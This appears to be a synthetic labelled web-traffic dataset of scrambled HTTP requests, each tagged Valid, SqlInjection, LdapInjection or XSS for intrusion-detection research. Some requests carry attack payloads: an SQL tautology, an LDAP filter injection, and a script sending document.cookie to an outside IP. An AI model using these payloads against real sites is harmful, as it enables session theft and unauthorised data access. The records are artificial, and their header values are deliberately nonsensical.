MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: NTLM YWl6VGUyb29zc3RtdWxpb3ZsYWF0bnhrc2NrZXRlZXBlU29tZWROd3U0
Authorization: wiea txirssN=niea1e
Range: 40090-
Referer: http://www.9atmqn.org/4oeps/Htelue/6agsnhle.php3
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/8.5 (Machintosh; U; Mac OS X 4.4; ln-eb; rv:8.4.2) Gecko/43601230
UA-CPU: MIPS
UA-Disp: 1912,4963,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 3416x9061
Via: HTTP/8.9 115.39.122.70, 0.2 232.216.89.160
Transfer-Encoding: gzip
Upgrade: nxew/9.7, neam/4.9, tRYe/6.4, 8mide/6.4, aola/1.1
Warning: 479 www.cld3el.css:64 "ogBceDtbEhhj6uwZ" 
X-Forwarded-For: 15.65.145.193
X-Serial-Number: 7835393170
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

reis=smeh2Tormtn8eitS&tiehustI6Behee=tOn@h1A6XO&mATyir41eptt=e4&reulrrtebnu=dgroup by0 ysatouit7Oua&me=ez_fW.hfjyN&ge1o8iAmkNras=@(7&iUd6qXcopyNSre=iod&uyenswnuatOi1a=]aou&T3e=6&hdaevpcpgnhotnu=5161257&ydnE=uoe70zpedil5dS&s8e5u5c4=1371501

End - Id: 5709
Start - Id: 14573
class: Valid
GET /e3zGgCi/esx03P_IK63aO/C.fuhome/pBZtE05Q/rtladD7tnR5xco/h8n3Ux7/oOl79Sr/sin/dahb8ofyqqHesetdckn/sGO5xP31ui5pLOHBd/oLLpqlkTp5gQ_.T/iIkNnbi.pl?ynle3yshatmoein=16&om=4etdrl4het&ec_U=51903&ticTcoh5etcuy=oknVblepreStredM&2qiD=%25ur+or&metOfttlo=nettwrsd4e8aee&iitixth1ch0s=n&diviUB=+Keperluleval+&ewiv7rted=rVNC8t&5sk=nIL4pbxnQh&Ur6ow0dpQO=laatnIeDdnrnsiifE&Ewnan=367&Nx0t8hat=t6cieatIoDni%2Fg0&utevlpoett05e=6S9EADQQ HTTP/1.1
Host: www.duooe.fr:80
Connection: close
Accept: application/zip;q=0.6, application/rtf;q=0.6, audio/*;q=0.7
Accept-Charset: *;q=0.8
Accept-Encoding: *
Accept-Language: esur-eEn;q=0.8, xpea-ok3m;q=0.3
Cache-Control: min-fresh=004
Client-ip: 224.242.101.75
Cookie: btserb=ncta0ekc ecan;Tap2;daaatCl=qsthVt;aan7mfwdeqtle=494410789;jah=sMnSnnzmjxx;ym0ditc=6807246040;bpua=\eksz
Cookie2: $Version="467"
Date: Tue, 22 Nov 05 22:02:00 GMT
ETag: ".O1a69NE@-RxPCb5"
Expect: ieSoy
From: loafnIt@stnehe3le.uk
If-Modified-Since: Mon, 27 Jun 05 17:36:59 CET
If-Unmodified-Since: Mon, 20 Mar 06 05:30:18 CET
If-Match: "Q_.fRynU3o3k1Kok8iw3"
If-None-Match: *
If-Range: Sun, 23 May 04 06:34:22 CET
Max-Forwards: 6
MIME-Version: 2.0
Pragma: Y=nrbaE
Proxy-Authorization: NTLM aW41bGllYWh0aG1tdGVyd2F0U3RucGJhaWg0ZGhybmZ0ZWVFb2hsbFA=
Authorization: Basic a2VzYXBrOnJpaG5vdDVv
Range: 958692-53,2925-6276
Referer: http://0fEhiGAp.org/rdnso3/gerp/geeo/nzsdzn.jpg
TE: trailers,chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/2.4 (Windows; U; Windows NT 8.6; eE-et; rv:7.6.2) Gecko/26494800
UA-CPU: 68000
UA-Disp: 962,7885,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 658x567
Via: 5.8 www.1lnae8rH.tiff
Transfer-Encoding: deflate
Upgrade: s0sUoi/6.0
Warning: 663 www.eNonNsgt.tiff "zwetin" "Wed, 09 Feb 05 17:14:54 GMT"
X-Forwarded-For: 214.165.29.201
X-Serial-Number: 703782437729534
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14573
Start - Id: 41733
class: SqlInjection
GET /hSemadllttoo/eihgeazic.css?2iioyhnl=80478244&YnUrelsss55=565725259&ngeyogasaoaAMm=Tauxy&nms=OR++++%27tuftn5%27+%3D++%27++%27&snl=rnIsphp9Oroaa&Ehrer=uhAiinx4nei&ftpTolqQ7f2J=820990&tu40tptaewlk1m=3979444&kPchildH=5321129&6NQT_kiscriptand=g-gVY2ZnKj0&sRcdwttojl7oydt=6571&mnHime=E3gyobjectentt HTTP/1.1
Host: www.uru8irQcr.de
Connection: keep-alive
Accept: audio/basic, audio/*
Accept-Charset: cp-936, x-mac-korean;q=0.3, windows-1255, x-mac-cyrillic
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: min-fresh=983
Client-ip: 136.31.14.94
Cookie: 9L-8y=94247939
Cookie2: $Version="023"
Date: Sat, 14 Oct 06 15:10:51 GMT
ETag: "x-y4MP-XTys@LWVZvO_A"
Expect: 100-continue
From: tn3rs6or@Itnftdpo.biz
If-Modified-Since: Thu, 10 Jul 08 20:51:12 UTC
If-Unmodified-Since: Sun, 08 Apr 07 01:30:30 GMT
If-Match: "O1j4Oo5sKpacAgUngj"
If-None-Match: *
If-Range: *
Max-Forwards: 073
MIME-Version: 5.7
Pragma: luamuo=xo
Proxy-Authorization: Basic cmllaHR0YnQ6dHJlMg==
Authorization: Basic eGF0aTppZW9sYUhp
Range: -9158,6593-962,-115779
Referer: http://www.nAih.cz/aOmc2r/Coiei0/jer9neT.avi
TE: deflate;q=0.1,trailers
Trailer: Trailer
User-Agent: Mozilla/2.7 (Windows; U; Win 9x 0.6; he-sa; rv:0.1.3) Gecko/56413146
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3172x1738
Via: 6.5 252.88.22.86, 57y/6.6 149.222.165.7, 9.5 www.4ztet.jpg:9432
Transfer-Encoding: compress
Upgrade: kmeyp7/6.4, oab/2.7, peZa/7.9, tihsau/8.6, rstvvt/0.5
Warning: 132 www.gls0.js "sseahcsnj2f1dtnEm93r" 
X-Forwarded-For: 208.165.185.87
X-Serial-Number: 775994
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41733
Start - Id: 15181
class: Valid
GET /es1ote69t4i3nc/greurkl/elheoeiA/njdocumentO/o3FHipXkwqrTQo.4UR0/wOpDiG4/md/e4tsnexueIoircitom/Tnwan7pEaxtIe/ua/tmmltc@e8VByql.png?boOopen1ymopt=e&jzjewmjea6=srOloTuoe0ae&Rki0vIf=nhrn&ciufrHnii=%3F&1vn1en=nkvjR&yda=9094597&WWxnNh.havingU9X=ec%3A HTTP/1.1
Host: www.haraei.cz
Connection: close
Accept: text/plain;q=0.8
Accept-Charset: *;q=0.4
Accept-Encoding: gzip, compress, gzip
Accept-Language: osree9d-ml9h;q=0.4, zun-spo;q=0.2, tiAkoeeu-hewpma
Cache-Control: only-if-cached
Client-ip: 207.13.17.145
Cookie: 618Luaohhhrdd=optfromi$@aiechosewfe9Dnn;cni2h=0
Cookie2: $Version="3"
Date: Fri, 25 Jan 08 03:54:15 UTC
ETag: "1J0CJwZLT_3R1Eo8z"
Expect: telm3us=uveE
From: hhshpbs@mnyd.cz
If-Modified-Since: Fri, 23 Jan 04 08:22:18 CET
If-Unmodified-Since: Sun, 08 Jan 06 12:02:27 GMT
If-Match: "3fnquvF2xWE-I7cD0Sgi"
If-None-Match: *
If-Range: *
Max-Forwards: 500
MIME-Version: 7.8
Pragma: fn5gse='er'
Proxy-Authorization: Basic ekswYTpsSHJlYXJo
Authorization: Basic bEFsRWJweTE6b3NhaA==
Range: 478892-,53727-
Referer: /olAs/ioan/r4qni/9sovye9n.asmx
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 6.3; eS-wr; rv:7.0.3) Gecko/73865469
UA-CPU: x86
UA-Disp: 1668,172,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 1443x630
Via: HTTP/6.7 253.32.60.45:57685, HTTP/2.4 www.terashn.js
Transfer-Encoding: deflate
Upgrade: 7jpt9/1.4, who/8.3, alnadh/2.9, eAa/5.4, imc/9.8
Warning: 690 www.t1telndw.html:946 "arsnbcneaieqbgnpwaea" 
X-Forwarded-For: 236.127.123.213
X-Serial-Number: 656353
----: ----------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 15181
Start - Id: 38046
class: LdapInjection
GET /a44un6hby/sQ36/uCctevalxnfCBlwRS/sV98dO0rixA2gM/L_objectemscriptfpU1pQbetween/yY8Cu_3yArv2zr.lXl/rJ9V/y1bMJJohV.kFz/ssjeouzeagntOlr/QSAm6.sh?kydhaameEun0ta=nmlTale&obsIZrif5=sthtriaccepta+ftptprplOsoio&nn5otsitectT4ET=%29++%28+%7C+%28tE%3Dgi*%29&neett=shtaccespn%3Brhor9i7o++9ao&meSnteSi2=rtio&EU3yU8eCy4=71760913&s5not=1583&0ntbwFEoadrA=%3Fchildec%3D1fazL HTTP/1.1
Host: www.6dRfoemm.de
Connection: close
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: compress, identity;q=0.5, deflate;q=0.0
Accept-Language: *
Cache-Control: no-transform
Client-ip: 26.50.164.170
Cookie: MMn7d=362;pinisewo=hpJxgiAiF;VuUmRphpjGkunionv=xn+ 
Cookie2: $Version="114"
Date: Tue, 03 Aug 04 02:21:18 UTC
ETag: W/"xYZoPZGX1onU_eKg0nd"
Expect: oTo0xsi=menaree;nEnewski
From: deigiel@Ostrbaef.it
If-Modified-Since: Wed, 28 Oct 09 16:23:12 CET
If-Unmodified-Since: Fri, 19 Feb 10 04:04:32 GMT
If-Match: "6DXCmkLeJQ1jlnI"
If-None-Match: *
If-Range: "QMRAQjv9PG5j7nUDk"
Max-Forwards: 30
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest qop=auth-int
Range: 6583-,350-4,-7502
Referer: /nVraiT/tqhrIus/aAhhh9ai/eRdt/o8ye9iv.nsf
TE: trailers,gzip,trailers
Trailer: Warning
User-Agent: e60aHsause2t9Far
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 427x816
Via: 1.5 www.nhcoew.jpg, 9.1 www.cels.png, 6.2 238.120.247.76
Transfer-Encoding: gzip
Upgrade: sok/2.9, aiedsC/6.4, uph/8.9
Warning: 961 113.136.152.242 "nasatnD5Noznimfy" "Sun, 16 Apr 06 05:05:21 UTC"
X-Forwarded-For: 136.67.166.110
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38046
Start - Id: 11409
class: Valid
GET /h3hrztyowiwrw/eohieehezsna51bmksk/tthr7wkpM/ei6iV8hNDWfo9hA/6eQle.pl? HTTP/1.1
Host: 191.177.90.251
Connection: dthP
Accept: text/html;q=0.8, application/postscript;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 5.46.141.238
Cookie: lan9si5e=wM.QuF7O;soodiesf8ttie=24120024;odHrey3=a;dnE8h=n@PidknVyi
Cookie2: $Version="67"
Date: Mon, 15 Dec 08 22:50:25 GMT
ETag: "Lc5f7Ww472E5lHHDC-iL"
Expect: 100-continue
From: snso@neess.uk
If-Modified-Since: Mon, 18 May 09 07:10:27 GMT
If-Unmodified-Since: Sat, 31 Mar 07 12:08:23 UTC
If-Match: "qvUWluqlqnvD-.2t."
If-None-Match: "7eVv2l8uCz_i637pI7"
If-Range: *
Max-Forwards: 830
MIME-Version: 4.6
Pragma: otncola='ckoax3dt'
Proxy-Authorization: vvE7 Aotiraig=rchah
Authorization: Digest nonce
Range: -56,26-
Referer: http://etlqwa.ch/pelOsmhh.jpg
TE: trailers
Trailer: Cache-Control
User-Agent: Mozilla/3.6 (compatible; MSIE 0.2; Mac OS X; nf0tetn8p; pihhg87; jurv)
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 380x1779
Via: s6nas/1.5 www.onE7iut.png, gizxei/3.3 www.akcboe.jpg, o0c/7.4 154.87.222.234
Transfer-Encoding: identity
Upgrade: ahoel/3.1, wtEif/8.0
Warning: 602 88.249.39.89 "aeraeytusrieOtkxPo" 
X-Forwarded-For: 194.171.248.197
X-Serial-Number: 99503371855760774661
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11409
Start - Id: 33221
class: Valid
POST /lV/etxU0iframeCQDU/n3t/tlS7Fwjbti/algaioruisOz6eol7he/J@MunionUEdN9_5M.html? HTTP/1.1
Content-Length: 236
Content-Language: 2ihsiies
Content-Encoding: compress
Content-Location: /lwohjv8/evA6n.gif
Content-MD5: YWllZ21zcmFlbmVUOGJkOQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 29 Dec 05 14:29:07 UTC
Last-Modified: Wed, 14 Jan 09 21:01:33 GMT
Host: 100.255.230.16
Connection: eu4q
Accept: text/*, video/*;q=0.9, video/quicktime
Accept-Charset: iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 231.54.182.74
Cookie: oeexyehil=b;IVhavingpv=7;oin=24735;o5=eth;uoweat=e 
Cookie2: $Version="624"
Date: Thu, 19 May 05 04:50:51 GMT
ETag: "pZoWtQw5tsmwPrt"
Expect: zhpnsnbp=t0or;egei=clnf1
From: 9nma9s@Escfl.biz
If-Modified-Since: Sat, 05 Apr 08 15:03:47 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:43:48 UTC
If-Match: "JxOWUBJQR9Jlt@9.ucd"
If-None-Match: "-Qvv97SuQ7R@GsBji0"
If-Range: *
Max-Forwards: 78
MIME-Version: 4.9
Pragma: hjIuteo='inl'
Proxy-Authorization: s2weid eddheoea=tmaa
Authorization: Basic aXBzdG9xb2k6Z2Q1aA==
Range: -352533,78-491
Referer: /x5aisw/hjgube/trRtlA/eads/nOffoc.nsf
TE: trailers,deflate
Trailer: Cache-Control
User-Agent: Mozilla/7.5 (X11; U; Open BSD i586 2.1; db-ir; rv:6.4.7) Gecko/69743485
UA-CPU: MIPS
UA-Disp: 088,074,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 334x7223
Via: eai5p/7.3 64.194.125.37:54, 3.0 www.heeenifl.js
Transfer-Encoding: identity
Upgrade: eia/6.1, dRehf6/3.4, ungss/9.9, faHsI8/4.3
Warning: 136 163.36.250.216 "merp" "Sun, 19 Nov 06 07:32:24 CET"
X-Forwarded-For: 83.167.179.226
X-Serial-Number: 979942
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tlStsNN=4160&eirrag=403975&ty7Neokntn3=834904&hitrpfanu=sock_streamsd&qwbservicessOWnqqg=l7h1m&ghd1=hni&eFr0imda0=nj@8XRj8e4@&ees6deneq=868436680&Ba1reiinos=eoii0/|e70i~7&du=ninx]eha %a&tb=4ehalnofiT&q0bciob5ttTez=55073829

End - Id: 33221
Start - Id: 24672
class: Valid
GET /esGsuF/VA/wOjGM4bqGz/htacrsslsaet/a@69X9y.jpeg?n9oma1f=bPi59g%40Q8s&lwgpiaxsa9nH=mMeomailtmheW&r3Upyctubmsa=olike%3B20 HTTP/1.0
Host: 60.34.70.251:80
Connection: keep-alive
Accept: text/plain, audio/x-wav;q=0.8, image/*;q=0.9
Accept-Charset: iso-8859-9;q=0.9, iso-2022-kr, iso-8859-8-i;q=0.0, hz-gb-2312;q=0.1, x-mac-turkish
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 148.233.252.203
Cookie: Es2iiesP0yhe= mfte;fue=x@J_;kgitttS=2622369;ic=y/e@w\oDseR:=rwmno0aa;vo7bqnrlehtyon=83;iB.aE-=Doscag
Cookie2: $Version="0"
Date: Sat, 26 Jul 08 10:15:16 CET
ETag: "UUtSeN9LUVPQfT3E"
Expect: u5o62at
From: tloo@08oaacota.gov
If-Modified-Since: Tue, 16 Dec 08 16:34:10 UTC
If-Unmodified-Since: Fri, 07 Aug 09 10:05:45 CET
If-Match: *
If-None-Match: *
If-Range: "HgYSsZBfjzXmedJPxv"
Max-Forwards: 98
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: ey32r aystd9=ymtsuleh
Authorization: Basic bm1KNWU6ZWg5bWg=
Range: 628095-,47-562,-3325
Referer: http://earXps.be/g4hism/dskbsi.png
TE: gzip;q=0.7,trailers,trailers
Trailer: Expect
User-Agent: iflTsshqrnsEt
UA-CPU: PowerPC
UA-Disp: 986,554,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 089x5784
Via: 0.6 58.50.49.95
Transfer-Encoding: Ncqi
Upgrade: wit/8.9
Warning: 540 44.10.123.96:4 "peien0ehi" 
X-Forwarded-For: 248.154.151.220
X-Serial-Number: 791354389748242566
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24672
Start - Id: 11455
class: Valid
GET /tk/JJc1qetc0cmdrcpOo.js?ostyHduirborpo=c%40-e&aWerLh=3196271013&ds3Rnnseesstm=delete%29e5earcpphlead&sesnianelwOe=achild&rtvTetMex=reO1c0n+pon&kePd=87924827&wlP%uPJBformX=8587670&n3ejzi1sss=3017205578&P9VS=wvjgu&3r6eiouoaCo1eot=90&tta7uaarC=7JOLfg_ar4 HTTP/1.0
Host: www.ieuc.it
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: euc-jp;q=0.4, x-mac-roman, iso-10646-ucs-2, x-mac-roman, cp-932;q=0.7
Accept-Encoding: *
Accept-Language: *;q=0.4
Cache-Control: hs='olkdmn'
Client-ip: 77.130.19.103
Cookie: hejduu=OnTg8zgqnpelt7eOv;dohhxehianeac=l;dagamrseenoDl=Se\si7ope" =sock_stream"pkh
Cookie2: $Version="36"
Date: Thu, 22 Apr 04 08:19:33 UTC
ETag: W/"R51MOFyEAdg@_kqyEB"
Expect: zbnlHn
From: ezBfko@fesnitr.uk
If-Modified-Since: Sat, 18 Jul 09 14:43:15 UTC
If-Unmodified-Since: Thu, 10 Feb 05 17:32:19 GMT
If-Match: *
If-None-Match: *
If-Range: "UIkuW_se5Vk@qx5KzD"
Max-Forwards: 50
MIME-Version: 2.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: NTLM bnJlcnR2bm5lSTJscXNlb29obG13VGhBcmNpaW90ZTdsMHJlZQ==
Range: 586-9658,-194
Referer: http://www.yb4l.net/Aftib5m.txt
TE: gzip;q=0.4
Trailer: From
User-Agent: Mozilla/8.2 (Windows; U; Win98 7.5; sE-4c; rv:7.4.2) Gecko/59018233
UA-CPU: Sparc
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 514x0544
Via: 9.5 147.55.209.164
Transfer-Encoding: deflate
Upgrade: csih/5.7
Warning: 907 www.lxlrE.htm "iLeehceeken" "Wed, 25 Jul 07 20:19:51 GMT"
X-Forwarded-For: 50.198.56.130
X-Serial-Number: 0375108727
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 11455
Start - Id: 30240
class: Valid
GET /SBou6eX-cOMZfmX/fYUyRy/aw3DXP4XUL5wk/np/9rhH/s6ssAort04/et__Go95wg/iVzJKqj/stb5yw7orcp.jsp?ai01hncesp4e=735642&wvl8ousdsnrEm=oZVO-&7eBitMtatt=tr+s&fhjycw=02&fbm2soe0tE8=154306 HTTP/1.0
Host: 3.1.0.162
Connection: close
Accept: image/png, audio/*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.4, compress, deflate;q=0.8
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 207.112.167.90
Cookie: tttLto5opasthes=a|s;cgcytm=44076;SameCrdrajoe7=tnVvcKS;7QuCcmd2aunionnMnE=lntallpmt
Cookie2: $Version="22"
Date: Mon, 11 Oct 04 05:14:03 CET
ETag: W/"Qx9NtHAQU6mkbd9komeV"
Expect: eela4=sEBd;adspdrga=rahfE
From: OtuSewg@hqerotci.biz
If-Modified-Since: Sat, 11 Oct 08 14:49:33 UTC
If-Unmodified-Since: Thu, 17 Sep 09 20:55:29 UTC
If-Match: "N@2VoZbAymZ8hvXyl5"
If-None-Match: "Qy0AFiaB_-WzSGZe"
If-Range: Sat, 03 Sep 05 05:08:11 GMT
Max-Forwards: 7
MIME-Version: 0.8
Pragma: at7f='ea'
Proxy-Authorization: cauv rfTcyhia=lorfye
Authorization: Basic ZWh1MGR0bDY6ZWMxcm0ydjk=
Range: 2-,581918-
Referer: http://www.axtPveb.net/ezur.jsp
TE: chunked
Trailer: Accept-Language
User-Agent: yeevstn (tC5EPDrT0c; 0A07NDWT; v3ebHd; b-2N9xeT49; dZwM2Uf)
UA-CPU: Sparc
UA-Disp: 2135,180,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 2607x1931
Via: 2.7 www.pieow7.jpg, FTP/8.1 www.e2eepesu.shtml
Transfer-Encoding: identity
Upgrade: rurqc/9.4, twtEpN/9.5, biuIoZ/1.1, rhm/3.9
Warning: 579 185.81.167.241 "3i0d" "Wed, 17 Jan 07 24:46:17 CET"
X-Forwarded-For: 27.179.187.38
X-Serial-Number: 325971
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30240
Start - Id: 5686
class: Valid
POST /K0-/2vrcpA/tzdTi3nccha3r/M-QDRj1evalgYKGphp/eeKDvm7W3nmt.html? HTTP/1.1
Content-Length: 246
Content-Language: s,z,ot6e
Content-Encoding: compress
Content-Location: /nwye/bdeHh.jpeg
Content-MD5: dHVOZW9ib3dlYm9ybmJ5RA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Apr 04 06:27:47 GMT
Last-Modified: Sun, 21 Nov 04 03:25:51 GMT
Host: 84.232.58.207
Connection: close
Accept: audio/*, application/postscript;q=0.9
Accept-Charset: iso-8859-6;q=0.2
Accept-Encoding: *
Accept-Language: e-mseoll3e, atieui-la, maxo4Gt-eamd0ffn;q=0.4, rcaEdz-ddagaiy, snet-azyizt;q=0.4
Cache-Control: no-transform
Client-ip: 52.203.165.218
Cookie: omodat=ogV.rDt3Ftt;rrhm=61;@ItsystemJcZ=sBr0IU;enhcsu4yfe=cX1u;hdrwwaheeas8I6=4849
Cookie2: $Version="01"
Date: Thu, 05 Feb 09 03:43:47 GMT
ETag: "gA-VXXIIO8mh8_lp"
Expect: pige=eph8;ttll6v
From: jdYeaesr@naae.de
If-Modified-Since: Thu, 15 Oct 09 16:00:20 GMT
If-Unmodified-Since: Sun, 19 Jun 05 18:27:18 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 141
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: 5emer ephane=n6oq
Authorization: NTLM dG1vZW11Ym1yMGFnbmtycHlxd21vZjd4YXJtbHhvY2lMeWlucXNmZGV1NHNzdA==
Range: -816900,24457-
Referer: http://www.hdhtl.st/lx4tn/teba/n9yinnv.php
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/4.5 (Windows; U; Win 9x 0.2; on-py; rv:6.3.1) Gecko/93627150
UA-CPU: PowerPC
UA-Disp: 1912,4963,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 327x1132
Via: 2.4 www.Ekfxr.png:4733, HTTP/1.5 www.htror4.tiff, 6.4 www.nIonia.png
Transfer-Encoding: gzip
Upgrade: tou/1.5, iievh/5.0, uedx/3.7
Warning: 162 253.233.234.60 "iILnb" "Mon, 07 Nov 05 13:32:13 UTC"
X-Forwarded-For: 33.1.105.183
X-Serial-Number: 7835393170
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aeor=dfsseAacammnh&boot.ini9Xperl=wkolslTfcyeDo&licritaenostrh=vn0'noptew%woTeietIhhr&rr=ts&0wsjtmehhdu=066828&eekbaostlosRp=eseetgDc4shtpass&lN_YK@=6&ateeneeqh=7417&zGrem=pN&yEcwoi8scth1s=14516&m3system7=jNczyYcQsbY&hbatRtn=891328&oe=7912911

End - Id: 5686
Start - Id: 25429
class: Valid
GET /h7Rex91e/tx7neahxoeen/ocnPe.k69yO.B/8Rhnre/rBV9/eQmhdi8eI5axndsjE/s7d8YRsbmhkstE8ei/jo38wgetexecqw.css? HTTP/1.1
Host: www.hny7mNxze.st:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: deflate
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 92.81.4.80
Cookie: ontl2rn=~;7ahorfuyeeEsw0o=xtermginput&<;s4tmiana98Leg9=oaautoexecaroreplace Hr=Ee3eboot.inid $;nccteepeioea=M] childfil4tj$services;dRele0=2d;yx= T
Cookie2: $Version="634"
Date: Tue, 09 Sep 08 15:48:29 GMT
ETag: W/"3mRfOB8JKF_XbSkIwX70"
Expect: keo3Em
From: ledpneia@lcpqUt.de
If-Modified-Since: Fri, 17 Mar 06 04:29:34 CET
If-Unmodified-Since: Sat, 16 Dec 06 06:44:02 UTC
If-Match: "jiShs_gZ8WWZBjv9"
If-None-Match: "exzZSAypmtQ@2P@PG8be"
If-Range: Wed, 18 Jul 07 03:57:13 GMT
Max-Forwards: 22
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM UmVsb2ZyemNJd2VncmFhd2k1QTVPc2hiY25ycmVzS2h1YWFTdGVlbWlr
Authorization: Msera ukeEon8=gIesu
Range: 792212-0
Referer: http://www.yseouEpl.be/fNsez/aIjean6.php4
TE: trailers,deflate;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: atcmmea
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 407x092
Via: 1.6 www.9aoeeos.css, 2.8 www.e95um9L.gif
Transfer-Encoding: compress
Upgrade: roti/6.6, neeqsd/9.8, ycfke/5.8, l52ps/7.9, Ahg/7.6
Warning: 257 2.176.158.197 "ifnht" 
X-Forwarded-For: 128.87.150.234
X-Serial-Number: 588564161052
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25429
Start - Id: 13958
class: Valid
GET /soeepkaoaaEsN0/v2n.FKv2/ceiaguam/kvfH77FQ6u.J37hJ/89h7DAXfl.bjkiB1tQ./0passthru28J.mspx?sn=ed8VhD3O&sicrnl00=tsjlnsetHa HTTP/1.0
Host: 152.87.91.213
Connection: it1mn8
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: cnsjaett-rmomtcsh;q=0.5, u7oRiu0K-nx;q=0.8, kr-neQatia, rjad-zo77Lf;q=0.4
Cache-Control: max-stale
Client-ip: 87.204.53.134
Cookie: fT64czfG=fe tbbetweennfr;deoJ2OPvatcGt8e=8790031;etet=esX8t3X;dslmeamBssifb=xiiohfcrmelg3tg;n3ergno=jyn
Cookie2: $Version="9"
Date: Sat, 24 Apr 04 16:51:01 GMT
ETag: W/"8JXFlRSCoI-nI9R6pUv"
Expect: 42eoe
From: oalearnr@ntEfqd.fr
If-Modified-Since: Wed, 28 Apr 10 18:18:27 GMT
If-Unmodified-Since: Sat, 09 Feb 08 02:36:16 GMT
If-Match: "FDXQxAPbk4z-VEzDK"
If-None-Match: "oiEvrTK72SjhEgD"
If-Range: Wed, 12 Jul 06 13:17:09 UTC
Max-Forwards: 28
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: snrqoV s1ss=Benjeh4e
Authorization: Digest opaque="Nzauwat"
Range: -3,-7138
Referer: http://www.bhyrDe5u.com/t8znd2/ae4hi/te0n/taa3rrna/mniy.aspx
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.4 (Machintosh; U; PPC 0.1; wN-aa; rv:9.3.5) Gecko/92966733
UA-CPU: MIPS
UA-Disp: 7939,4903,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7780x7588
Via: uiS9e/6.0 www.aeeohhW.html, i7ktml/1.7 177.192.255.158
Transfer-Encoding: identity
Upgrade: 0tfui/2.9, esnct/9.2, find4/9.4
Warning: 527 www.Lwsnus0.gif "ereraxi" 
X-Forwarded-For: 231.230.155.168
X-Serial-Number: 23409980
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13958
Start - Id: 47226
class: XSS
GET /efrV2JY0r5g/echok6M@j/oseywspnfeeoleeeoaUy/trtAed1a0ocwth.png?ihout6h=pvP&omlirhit7vgn=44&rl2aiiNgowu=a0do%3Dnecho7%3EmochaDgl+nEsS+&mee1orsnlzet=eo&ser9trt5apmkna=iHbzTjh0&tte=%26%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F122.77.27.114%2Forasit.asp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+%3E HTTP/1.1
Host: www.uobewpTa.st:7147
Connection: close
Accept: audio/basic, image/gif;q=0.2, audio/basic;q=0.5
Accept-Charset: windows-1253;q=0.5, shift_jis;q=0.1, iso-8859-15, gb2312, iso-8859-4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 179.225.149.173
